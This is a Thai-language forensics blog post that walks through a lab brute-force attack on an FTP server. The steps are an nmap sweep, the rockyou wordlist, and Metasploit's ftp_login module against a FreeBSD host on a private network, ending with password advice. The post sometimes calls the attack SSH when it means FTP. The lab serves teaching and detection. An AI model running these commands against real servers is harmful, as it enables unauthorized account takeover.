Saturday, August 14, 2021

DIGITAL FORENSICS: BRUTE FORCE ATTACK FTP

DIGITAL FORENSICS: BRUTE FORCE ATTACK FTP


การทำ Brute Force Attack คือการสุ่มรหัสผ่าน “ทุกความเป็นไปได้” จนกว่าจะเจาระบบได้ โดยเริ่มจากรหัสผ่านที่ ง่ายก่อน อาชญากรจะใช้โปรแกรมที่ทำงานอัตโนมัติในการสุ่ม และอาจใช้คอมพิวเตอร์ของผู้อื่นที่ตนสามารถควบคุมได้จากทางไกล (หรือที่เราเรียกว่าเครื่องคอมพิวเตอร์ “ซอมบี้”) ในการช่วยสุ่มเพื่อให้สามารถเจาะระบบได้เร็วขึ้น วิธีป้องกันคือตั้งรหัสผ่านที่แข็งแรง เครดิตข้อมูล บรรยายสาธารณะ “กระบวนการแสวงหาและพิสูจน์พยานหลักฐานดิจิทัลเชิงเทคนิค”

FTP (File Transfer Protocol) คือโพรโทคอลที่ออกแบบมาเพื่อใช้ในการรับส่งไฟล์ระหว่าง Client และ Server โดยจะมีพอร์ตที่ใช้งานอยู่ 2 พอร์ต คือ พอร์ต 20 ใช้ในการรับส่งไฟล์ ส่วนอีกพอร์ตคือ พอร์ต 21 ใช้ในการควบคุมหรือส่งคำสั่ง FTP เช่น ตรวจสอบการเข้าถึงโปรแกรมจากผู้ใช้งาน เป็นต้น และในปัจจุบัน ผู้ให้บริการ Web hosting โดยส่วนใหญ่มักจะให้บริการแลกเปลี่ยนไฟล์ผ่าน FTP Server เพราะการการติดตั้งระบบและการบริหารจัดการไฟล์ทำได้ง่าย

เนื่องจาก FTP เป็นโพรโตคอลที่รับส่งข้อมูลโดยไม่มีการเข้ารหัสลับ จึงทำให้ข้อมูลที่รับส่ง ไม่ว่าจะเป็น Username หรือ Password สามารถถูกดักรับ (Sniff) จากผู้ไม่หวังดีได้ [1] ซึ่งวิธีการแก้ไขนั้น ผู้ดูแลระบบควรเปลี่ยนมาใช้โพรโทคอลสำหรับแลกเปลี่ยนข้อมูลที่มีการเข้ารหัสลับข้อมูลที่รับส่งเสมอ ซึ่งมีโพรโทคอลที่ถูกออกแบบมาเพื่อแก้ปัญหาดังกล่าว คือ FTPS [2] เครดิตข้อมูล  thaicert 


ในทางการพิสูจน์หลักฐานผู้สืบสวนควรศึกษาวิธีการและเครื่องมือที่ใช้งานเพื่อประโยชน์ในการค้นหาหลักฐาน


สิ่งที่ต้องเตรียมในการทดสอบการโจมตีระบบโดยช่องทางSecure Shell (SSH)

 - nmap เป็นโปรแกรมที่ใช้ในการสแกนตรวจสอบเครื่องคอมพิวเตอร์และอุปกรณ์ในระบบเครือข่าย โดยรายละเอียด  IP Address , port, service, os  เป็นต้น

 - wordlists คือไฟล์ที่รวบรวม รหัสต่างไว้ เช่น ตัวเลข รหัสผ่าน  ข้อมูล password จากที่ต่างไว้สำหรับทดสอบ

 - Kali   คือระบบปฏิบัติการณ์ลินุกซ์ (Linux) ที่ใช้สำหรับทดสอบระบบ  โดยใช้ Metasploit  คือตัวโปรแกรมที่ใช้ในการทดสอบการเจาะระบบ(Penetration Testing) 

 - FreeBSD เครื่องคอมพิวเตอร์ เป้าหมายที่ถูกทดสอบการโจมตี 


Step 1

- nmap –sn 192.168.233.0/24

IP ทำการตรวจสอบ IP address ของเครื่องก่อน

Nmap –sn 192.168.233.0/24  ตรวจสอบ IP address ในเครือข่ายทั้งหมด
ผลลัพธ์ที่ได้ พบเครื่องคอมพิวเตอร์ เป้าหมายที่ถูกทดสอบมี IP 192.168.233.133  เปิดบริการพอร์ท  21 FTP

Step 2

- บน Kali ทำการเตรียม wordlists Rockyou

ls -l /usr/share/wordlists/

cd /usr/share/wordlists/

gunzip rockyou.txt.gz  ทำการแตกซิป


Step 3

- Kali   ใช้โปรแกรม Metasploit

#Msfconsole

search ftp_login

use auxiliary/scanner/ftp/ftp_login

show options 



  • msf auxiliary(ftp_login) > set PASS_FILE /usr/share/wordlists/rockyou.txt 
  •         msf auxiliary(ftp_login) > set RHOSTS 192.168.233.133
  •         msf auxiliary(ftp_login) > set STOP_ON_SUCCESS true
  •         msf auxiliary(ftp_login) > set threads 8
  •         msf auxiliary(ftp_login) > set USERnAME ladda
  •         msf auxiliary(ftp_login) > set verbose true
  •         msf auxiliary(ftp_login) > run


Success เมื่อพบรหัสผ่านก็จะแสดงตามหน้าจอด้านล่าง


- FreeBSD 192.168.233.133  หน้าจอแสดงเครื่องเป้าหมายที่ถูกทดสอบการโจมตี Brute Force Attack FTP พบว่ามีการพยายาม login และรหัสผิดหลายครั้ง


Step 4

บน Kali  ให้ใช้งาน FTP  ทำการนำ  user และ password ที่ได้ไป login ระบบ

  #FTP ladda@192.168.233.133



อ่านเพิ่มเติม BRUTE FORCE ATTACK SSH


สรุป

จากจำลองเหตุการณ์ว่ามีการโจมตีไปในระบบ โดยวิธี Brute Force Attack ผ่านทาง SSH พบว่าการตั้ง password  ง่ายทำให้โดนโจมตีได้ง่ายและ โดนเดารหัสได้ง่าย  แนะนำวิธีการตั้งรหัสผ่านที่ปลอดภัย


            
         detect-ftp-brute-force-attack/

#WINDOWSFORENSIC #COMPUTERFORENSICS #DFIR #FORENSICS #DIGITALFORENSICS #COMPUTERFORENSIC #INVESTIGATION #CYBERCRIME #FRAUD #หลักสูตรการพิสูจน์หลักฐานทางดิจิทัล


หมายเหตุ:เนื้อหาในเว็บไซต์นี้มีขึ้นเพื่อวัตถุประสงค์ในการให้ข้อมูลและเพื่อการศึกษาเท่านั้น

* หากมีข้อมูลข้อผิดพลาดประการใด ขออภัยมา ณ ที่นี้ด้วย  รบกวนแจ้ง ADMIN เพื่อแก้ไขต่อไป
ขอบคุณครับ

No comments:

Post a Comment

Digital Forensics:CDIC2024

Digital Forensics:CDIC2024    งานสัมมนาประจำปีด้านความมั่นคงปลอดภัยไซเบอร์  27-28 พฤศจิกายน 2567 ณ Grand Hall ไบเทค บางนา วันนี้แอดแวะมางาน ...